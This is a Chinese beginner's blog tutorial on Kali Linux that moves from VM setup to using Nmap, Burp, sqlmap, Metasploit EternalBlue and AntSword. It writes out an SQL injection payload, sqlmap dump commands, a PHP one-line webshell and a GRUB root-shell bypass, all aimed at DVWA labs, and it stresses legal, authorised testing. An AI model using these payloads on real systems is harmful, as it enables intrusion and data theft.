新手黑客必备的Kali Linux到底该怎么学?如何才能成为会用工具的脚本小子?2025版Kali Linux入门指南

前言:

当你花了 2 个小时在虚拟机里装好了 Kali Linux—看到屏幕上弹出黑色的终端界面,光标闪烁着 “root@kali:~#” 时,你会不会慌乱?接下来该输什么命令?这些工具怎么用?网上说的 “用 Kali 挖漏洞”,到底从哪下手?

很多人入门黑客第一步就是学Kali,但却连 “终端和 CMD 的区别” 都不知道,只会对着满屏的工具图标乱点:点 Nmap 弹出一堆英文参数,点 Burp Suite 不知道怎么抓包,点 SQLMap 连目标 URL 都不会填。几个小时后关掉虚拟机,开始怀疑:“我是不是没天赋学这个?”

其实,90% 的新手学不会 Kali,不是因为难,是把‘从入门到精通’的路,当成了‘打开软件就会’的事。

今天这篇文章,我会把自己踩过的坑、总结的实战技巧,全部分享给你 —— 新手学 Kali,真的不用怕。

第一:Kali 入门第一步:先解决 “新手最痛的 3 个问题”

新手学 Kali,最容易卡在 “安装、联网、记命令” 这三步。我当初因为不会联网,浪费了 2 天时间;因为记不住命令,差点放弃。其实只要找对方法,这些问题 1 小时就能解决。

1. 安装:别纠结 “双系统”,虚拟机是新手最佳选择

很多新手一开始就想装 “双系统 Kali”,觉得 “这样更专业”,结果分区失误导致电脑数据丢失。其实对新手来说,VMware 虚拟机装 Kali才是最优解:不用改硬盘分区,出问题直接删虚拟机,不影响电脑本身。

新手安装避坑指南:
步骤关键操作常见错误解决方法
下载镜像从 Kali 官网(https://www.kali.org/)下载 “64-bit VMWARE” 镜像下成 “Live 镜像” 或 “其他虚拟机镜像”认准 “VMWARE” 标识,镜像名带 “vmware-amd64”
导入虚拟机打开 VMware,选择 “打开虚拟机”,加载下载的镜像导入后提示 “硬件不兼容”编辑虚拟机设置,将 “兼容性” 改为自己 VMware 版本(如 17.x)
初始登录用户名 “kali”,密码 “kali”(默认账号密码)忘记密码或登录后黑屏重启虚拟机,在 GRUB 界面按 “e”,添加 “init=/bin/bash”,进入单用户模式改密码

我的经验:第一次安装不用改任何配置,默认的 2 核 CPU、4G 内存、20G 硬盘足够新手使用。等后期用熟练了,再根据需要增加内存(比如加到 8G)。

img

2. 联网:解决 “能连 WiFi 但上不了网” 的新手噩梦

我当初安装后,发现 Kali 能连 WiFi,但打开浏览器却加载不出网页,查了半天才知道是 “DNS 配置问题”。新手联网遇到问题,按这 3 步排查,90% 能解决:

联网问题排查流程:
  1. 检查 IP 地址:打开终端,输入ip a(查看网络接口),看是否有 “inet” 开头的 IP(如 192.168.1.100)。如果没有,说明没获取到 IP,重启网络:sudo systemctl restart NetworkManager

  2. 测试网关连通性:输入ping 192.168.1.1(替换成你家路由器的网关,一般是 192.168.1.1 或 192.168.0.1)。如果 ping 不通,检查虚拟机网络模式(新手选 “NAT 模式”,能直接用主机的网络)。

  3. 配置 DNS:

    如果能 ping 通网关但上不了网,是 DNS 的问题。编辑 DNS 配置文件:

    sudo nano /etc/resolv.conf
    

    添加两行:

    nameserver 8.8.8.8  # 谷歌DNS
    nameserver 114.114.114.114  # 国内DNS
    

    Ctrl+O
    

    保存,

    Ctrl+X
    

    退出,再 ping 百度测试:

    ping www.baidu.com
    

    能收到回复就是联网成功。

3. 记命令:别死记硬背,先掌握 “10 个高频命令”

新手最怕记命令,其实 Kali 常用命令就 10 个,先学会这些,足够应对 80% 的基础操作:

命令作用新手实战场景
ls查看当前目录文件装完工具后,用ls看工具是否在目录里
cd切换目录cd /usr/share/nmap进入 Nmap 工具目录
sudo以管理员权限执行命令改配置文件时,用sudo nano 文件名
apt install 工具名安装工具缺某个工具时,用sudo apt install sqlmap安装
ping 目标IP测试网络连通性扫描前用ping 192.168.1.10看目标是否在线
nmap 目标IP端口扫描nmap 192.168.1.10看目标开放了哪些端口
ifconfig/ip a查看本机 IP连不上靶场时,用ip a看自己的 IP 是否和靶场在同一网段
clear清空终端命令太多看不清时,用clear清屏
cp 源文件 目标路径复制文件把漏洞 POC 复制到桌面:cp /root/poc.py /root/Desktop/
rm 文件名删除文件删除没用的日志:rm /var/log/test.log

记命令技巧:把这 10 个命令写在便利贴上,贴在电脑旁边,用的时候看一眼,3 天就能记住。比如每次打开终端,先输clear清屏,再输ip a查 IP,重复几次就熟了。

第二:新手必学的 5 类 Kali 核心工具:从 “会打开” 到 “能实战”

Kali 里有 300 + 工具,但新手不用全学,先聚焦 “信息收集、漏洞扫描、漏洞利用、Webshell 管理、内网渗透” 这 5 类核心工具,每个工具学 “最常用的 2-3 个功能”,就能满足脚本小子的实战需求。

1. 信息收集工具:搞懂 “目标是谁、开了哪些门”

信息收集是黑客的第一步 —— 不知道目标的 IP、端口、服务,后续就没法挖漏洞。新手重点学Nmap(端口扫描)和OneForAll(子域名收集)。

(1)Nmap:新手必学的 “端口扫描神器”

Nmap 的功能很多,但新手只要会 3 个命令,就能搞定基础扫描:

  • 基础端口扫描nmap 192.168.1.10(扫描目标 IP 的常用端口,默认扫描 1000 个端口)
  • 全端口扫描nmap -p 1-65535 192.168.1.10(扫描所有 65535 个端口,适合找隐藏端口)
  • 扫描服务版本nmap -sV 192.168.1.10(显示端口对应的服务版本,比如 “80/tcp open http Apache httpd 2.4.49”)

新手实战任务:用 Nmap 扫描自己的 DVWA 靶场 IP(比如 192.168.1.12),找出开放的 80 端口(Web 服务)和 3306 端口(MySQL 数据库),记录服务版本。

img

(2)OneForAll:子域名收集 “效率工具”

如果目标是一个网站(比如test.com),光扫主域名不够,还要找子域名(比如admin.test.comblog.test.com),这些子域名往往防护更弱。OneForAll 是 Kali 自带的子域名收集工具,新手只要输 1 条命令:

  • python3 /usr/share/oneforall/oneforall.py --target test.com run(替换成目标域名)

工具会自动从 20 + 平台(如 DNS 查询、搜索引擎)收集子域名,结果保存在/root/OneForAll/results/目录下,打开 CSV 文件就能看到所有子域名和对应的 IP。

img

2. 漏洞扫描工具:让 “漏洞自己浮出水面”

新手手动找漏洞效率低,用扫描工具能快速发现目标的基础漏洞。重点学Burp Suite(抓包改包)和Xray(自动化漏洞扫描)。

(1)Burp Suite:Web 漏洞测试 “万能工具”

Burp Suite 是新手必须掌握的工具,核心用 “Proxy(代理)” 和 “Repeater(重放)” 功能,步骤如下:

  1. 配置代理:打开 Burp,在 “Proxy→Intercept” 里点击 “Open Browser”,会弹出一个内置浏览器。
  2. 抓包:用内置浏览器访问 DVWA 靶场的登录页,输入账号密码点击登录,Burp 会拦截到登录请求(Intercept 显示 “Intercepted”)。
  3. 改包测试:把拦截到的请求发送到 Repeater(右键→Send to Repeater),在 Repeater 里修改 “username” 参数(比如把admin改成admin' or 1=1#),点击 “Send”,看响应是否返回管理员信息(测试 SQL 注入漏洞)。

新手实战任务:用 Burp 抓 DVWA 登录请求,修改username参数为admin' or 1=1#,成功登录管理员后台。

(2)Xray:自动化扫描 “懒人神器”

Xray 能自动扫描 Web 漏洞(如 SQL 注入、XSS、文件上传),新手用 “被动扫描” 模式(不主动发请求,只分析 Burp 拦截的流量),步骤:

  1. 启动 Xray 代理:./xray_linux_amd64 webscan --listen 127.0.0.1:8081 --html-output xray-result.html(在 Xray 目录下执行,Kali 默认路径/usr/share/xray/
  2. 配置 Burp 上游代理:在 Burp 的 “Proxy→Options→Upstream Proxy Servers” 里,添加 “127.0.0.1:8081”,让 Burp 把流量转发给 Xray。
  3. 浏览目标:用 Burp 内置浏览器访问 DVWA,点击各个功能模块(如 SQL Injection、XSS),Xray 会自动分析流量,生成漏洞报告(xray-result.html)。

3. 漏洞利用工具:从 “发现漏洞” 到 “拿下目标”

找到漏洞后,需要用工具利用漏洞获取权限。新手重点学SQLMap(SQL 注入利用)和Metasploit(漏洞 exp 利用)。

(1)SQLMap:SQL 注入 “终极工具”

新手不用懂复杂的注入原理,用 SQLMap 能自动利用 SQL 注入漏洞,导出数据库数据。核心命令:

  • 基础注入测试sqlmap -u "http://192.168.1.12/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=abc123"(替换成自己的靶场 URL 和 Cookie,Cookie 从 Burp 里复制)
  • 导出数据库sqlmap -u 目标URL --cookie 你的Cookie --dbs(列出所有数据库),再用--tables -D dvwa(列出 dvwa 数据库的表),最后--dump -D dvwa -T users(导出 users 表数据,能拿到管理员账号密码)

新手实战任务:用 SQLMap 导出 DVWA 的 users 表,获取admin账号的密码(默认加密后的密码是5f4dcc3b5aa765d61d8327deb882cf99,解密后是password)。

(2)Metasploit:漏洞 exp “武器库”

Metasploit 里有 1000 + 漏洞的 exp(漏洞利用代码),新手用它来利用已知漏洞(比如永恒之蓝漏洞)。以利用 Windows 的永恒之蓝漏洞为例:

  1. 启动 Metasploit:msfconsole
  2. 搜索 exp:search ms17-010(ms17-010 是永恒之蓝漏洞的编号)
  3. 加载 exp:use exploit/windows/smb/ms17_010_eternalblue
  4. 设置目标 IP:set RHOSTS 192.168.1.20(目标 Windows 机器的 IP)
  5. 执行攻击:run,成功后会拿到目标的 shell(显示 “Meterpreter session 1 opened”)

4. Webshell 管理工具:“控制目标” 的最后一步

如果通过文件上传漏洞拿到了 Webshell(比如一句话木马),需要用工具连接管理。新手重点学蚁剑(图形化管理,简单直观)。

蚁剑使用步骤:
  1. 准备 Webshell:在 DVWA 的文件上传模块(Low 难度),上传一个 “图片马”(把<?php @eval($_POST['cmd']);?>写入图片文件,改后缀为.php)。
  2. 打开蚁剑:Kali 里搜索 “AntSword”,打开后点击 “添加数据”。
  3. 配置连接:
    • URL:上传的 Webshell 路径(比如http://192.168.1.12/dvwa/hackable/uploads/shell.php
    • 密码:cmd(和 Webshell 里的$_POST['cmd']对应)
  4. 连接:点击 “测试连接”,显示 “连接成功” 后,就能管理目标服务器(比如浏览文件、执行命令)。

5. 内网渗透工具:“突破边界” 的基础工具

如果拿下了目标的边界服务器(比如 Web 服务器),还需要渗透内网。新手重点学Cobalt Strike(简称 CS,内网协作工具),但 CS 需要破解版或授权,新手先学基础的 “内网信息收集” 命令:

  • 在目标服务器上执行ipconfig(Windows)或ip a(Linux),看内网段(比如 10.0.0.0/24);
  • ping 10.0.0.2测试内网其他机器是否在线;
  • net view(Windows)查看内网共享资源,寻找下一步渗透目标。

第三:成为 “合格脚本小子” 的 3 个关键:避开误区,合法实战

很多新手以为 “会用工具就是脚本小子”,结果要么乱用工具违法,要么只会点几下鼠标,遇到问题就卡壳。其实合格的脚本小子,要满足 3 个条件:会用工具 + 懂基础原理 + 合法实战

1. 误区 1:“只会点工具,不懂原理”—— 永远停留在 “入门”

我当初用 SQLMap 跑通注入后,以为自己 “会黑客技术了”,直到有人问 “为什么输入' or 1=1#能登录”,我答不上来。后来才明白,脚本小子不能只 “知其然”,还要 “知其所以然”。

新手必懂的 3 个基础原理:
  • SQL 注入原理:用户输入的参数没被过滤,直接拼接到 SQL 语句里,导致恶意 SQL 语句被执行(比如select * from users where username='admin' or 1=1#'#注释掉后面的内容,语句恒真);
  • XSS 原理:网站没过滤用户输入的 HTML/JS 代码,导致恶意脚本在其他用户浏览器里执行(比如在评论区输入<script>alert('XSS')</script>,其他用户打开页面会弹出警告);
  • 文件上传漏洞原理:网站没校验上传文件的真实类型,导致恶意脚本文件(如.php)被上传到服务器并执行。

学习方法:学完一个工具后,花 10 分钟查 “这个工具利用的漏洞原理是什么”,比如用 SQLMap 后,查 “SQL 注入原理”;用蚁剑后,查 “一句话木马的工作原理”。

2. 误区 2:“乱扫真实网站,触碰法律红线”—— 前途尽毁

我在学 Nmap 时,一时好奇扫描了小区物业的官网,结果第二天收到网警电话,警告我 “未经授权的网络扫描属于违法行为”。新手一定要记住:所有实战必须在合法场景下进行,否则轻则罚款拘留,重则承担刑事责任。

新手合法实战的 3 个渠道:
  • 靶场:DVWA(Web 漏洞基础)、SQLI-LAB(SQL 注入专项)、VulnHub(内网渗透模拟),这些都是官方提供的合法测试环境,怎么测都不违法;
  • SRC 平台:企业官方的安全应急响应中心(如阿里云 SRC、腾讯 SRC),提交漏洞前看清楚规则,只测试平台允许的资产;
  • 授权测试:通过安全公司或工作室,拿到企业的书面授权后,再进行渗透测试。

3. 误区 3:“追求‘高大上’工具,忽视基础操作”

新手总喜欢装各种 “炫酷工具”(比如自动挖洞脚本、破解版 CS),结果连 Nmap 的基础参数都记不住。其实对脚本小子来说,把基础工具用熟,比装 100 个工具更有用

新手工具学习原则:
  • 先学 Kali 自带工具(Nmap、Burp、SQLMap),再学第三方工具(OneForAll、蚁剑);
  • 每个工具只学 “实战高频功能”,比如 Burp 先学 Proxy 和 Repeater,再学 Intruder 和 Scanner;
  • 不装 “来源不明的工具”,避免被植入木马(比如网上的 “自动挖洞脚本”,可能偷你的测试数据)。

第四:脚本小子的进阶方向:从 “会用工具” 到 “能解决问题”

成为合格脚本小子后,不要满足于 “点几下工具”,要向 “能独立挖漏洞、解决实际问题” 的方向进阶。我总结了 3 个进阶步骤,帮你为以后成为渗透测试工程师打基础:

1. 第一步:从 “靶场” 到 “SRC”,积累真实漏洞经验

靶场的漏洞都是 “预设好的”,而真实环境的漏洞需要自己找。新手可以从 SRC 平台入手,提交简单的漏洞(如 XSS、信息泄露),步骤:

  1. 选低门槛 SRC:比如补天平台的 “新手专区”,里面的目标防护弱,容易出成果;
  2. 定测试范围:只测试平台列出的 “允许测试域名”,不越界;
  3. 写漏洞报告:包含 “漏洞位置、利用步骤、危害说明、修复建议”,附截图证明(比如 XSS 漏洞,附弹出警告框的截图)。

我第一次在 SRC 提交的是 “某网站登录页的反射型 XSS 漏洞”,虽然只是低危漏洞,但拿到了平台的 “漏洞确认” 邮件,这是我第一次感受到 “用技术创造价值” 的成就感。

2. 第二步:学 “简单编程”,提升工具使用效率

脚本小子不用成为 “程序员”,但要会写简单的脚本,解决重复工作。比如用 Python 写一个 “批量检测 XSS 漏洞” 的脚本,步骤:

  1. 学 Python 基础:重点学requests库(发 HTTP 请求)和re库(正则匹配);
  2. 写脚本逻辑:遍历目标 URL 列表,往参数里插入<script>alert('XSS')</script>,判断响应是否包含插入的脚本;
  3. 测试脚本:用 DVWA 的 XSS 模块测试,看脚本是否能成功检测到漏洞。

推荐学习资源:优快云 上的《Python 安全编程入门》系列文章,重点看 “HTTP 请求”“正则匹配” 章节,1 周就能上手写简单脚本。

3. 第三步:了解 “安全合规”,避免踩法律坑

进阶后会接触更多真实项目,必须懂 “安全合规”—— 知道哪些能做,哪些不能做。新手重点了解 2 个法规:

  • 《网络安全法》:明确 “未经授权不得侵入他人网络、获取数据”,即使未造成损失,也可能面临行政处罚;
  • 《数据安全法》:禁止 “窃取、泄露敏感数据”(如用户手机号、身份证号),违者最高可处 5000 万元罚款。

结语:新手学 Kali,最需要的不是 “天赋”,是 “耐心”

回望我学 Kali 的 3 个月,从 “对着终端发呆” 到 “用 SQLMap 导出数据库”,从 “不敢实战” 到 “提交 SRC 漏洞”,最大的感悟是:新手学 Kali,没有 “一步登天” 的捷径,只有 “循序渐进” 的踏实

如果你现在打开 Kali 还是会懵,别慌 —— 先学会 “输对第一条命令”,再学会 “用 Nmap 扫第一个端口”,接着学会 “用 SQLMap 跑第一个注入”。每完成一个小目标,你就离 “合格脚本小子” 近一步。

最后提醒你:脚本小子不是 “黑客的终点”,而是 “安全学习的起点”。当你能用工具解决真实问题,能懂漏洞原理,能合法实战时,你就已经超越了 90% 的新手 —— 而这,正是成为渗透测试工程师的基础。

现在,打开你的 Kali 虚拟机,输入第一条命令吧 —— 未来的你,会感谢现在开始行动的自己。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

kali中文介绍,适合新手使用。Kali Linux 特性 Kali是BackTrack Linux完全遵循Debian开发标准的完整重建.全新的目录框架、复查并打包所有工具、还为VCS建立了Git 树. 超过300个渗透测试工具: 复查了BackTrack里的每一个工具之后,我们去掉了一部分已经无效或功能重复的工具. 永久免费: Kali Linux一如既往的免费.你永远无需为Kali Linux付费. 开源Git树: 我们是开源软件忠实的拥护者,那些想调整或重建包的人可以浏览我们的开发树得到所有源代码. 遵循FHS: Kali的开发遵循Linux目录结构标准,用户可以方便的找到命令文件、帮助文件、库文件等.. 支持大量无线设备: 我们尽可能的使Kali Linux支持更多的无线设备,能正常运行在各种各样的硬件上,能兼容大量USB和其它无线设备. 集成注入补丁的内核: 作为渗透测试者或开发团队经常需要做无线安全评估.所以我们的内核包含了最新的注入补丁. 安全的开发环境: Kali Linux开发团队由一群可信任的人组成,他们只能在使用多种安全协议的时候提交包或管理源. 包和源有GPG签名: 每个开发者都会在编译和提交Kali的包时对它进行签名,并且源也会对它进行签名. 多语言: 虽然渗透工具趋向于用英语,但我们确保Kali有多语言支持,可以让用户使用本国语言找到他们工作时需要的工具. 完全的可定制: 我们完全理解,不是每个人都赞同我们的设计决定,所以我们让更多有创新精神的用户定制Kali Linux (甚至定制内核)成他们喜欢的样子变得尽可能的容易. ARMEL和ARMHF支持: 自从基于ARM的设备变得越来越普遍和廉价,我们就知道我们该竭尽全力的做好Kali的ARM支持.因此有了现在的ARMEL 和 ARMHF架构的系统.Kali Linux有完整的主线发行的ARM源,所以ARM工具将会和别的本同时更新.Kali现在可以运行在如下的ARM设备:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值